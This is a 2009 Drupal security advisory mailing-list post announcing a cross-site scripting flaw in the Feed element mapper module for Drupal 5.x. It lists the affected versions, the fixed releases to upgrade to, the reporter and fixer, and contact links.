[Security-news] SA-CONTRIB-2009-018 - Feed element mapper - Cross site scripting
security-news at drupal.org
security-news at drupal.org
Thu Mar 26 18:37:44 UTC 2009
* Advisory ID: DRUPAL-SA-CONTRIB-2009-018
* Project: Feed element mapper (third-party module)
* Version: 5.x
* Date: 2009-March-26
* Security risk: Less critical
* Exploitable from: Remote
* Vulnerability: Cross-site scripting (XSS)
-------- DESCRIPTION ---------------------------------------------------------
Feed element mapper is an Add-on module for FeedAPI that maps elements on a
feed item such as tags or the author name to taxonomy or CCK fields. These
mappings are configurable by point and click. The module doesn't correctly
escape content titles enabling malicious users to insert arbitrary HTML and
scripts into certain pages. Such a cross site scripting [1] (XSS) attack
against sufficiently privileged users may lead to adminstrator access to the
site.
-------- VERSIONS AFFECTED ---------------------------------------------------
* Versions of Feed element mapper for Drupal 5.x prior to 5.x-1.1
Drupal core is not affected. If you do not use the contributed Feed element
mapper module, there is nothing you need to do.
-------- SOLUTION ------------------------------------------------------------
Install the latest version:
* If you use Feed element mapper for Drupal 5.x upgrade to Feed element
mapper 5.x-1.1 [2]
If you use one of the unsupported Feed element mapper 6.x-1.0 beta versions,
upgrade to Feed element mapper 6.x-1.0-beta5 [3].
See also the Feed element mapper project page [4].
-------- REPORTED BY ---------------------------------------------------------
James Gilliand [5]
-------- FIXED BY ------------------------------------------------------------
Alex Barth [6]
-------- CONTACT -------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact [7].
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/414644
[3] http://drupal.org/node/414640
[4] http://drupal.org/project/feedapi_mapper
[5] http://drupal.org/user/48673
[6] http://drupal.org/user/53995
[7] http://drupal.org/contact
More information about the Security-news
mailing list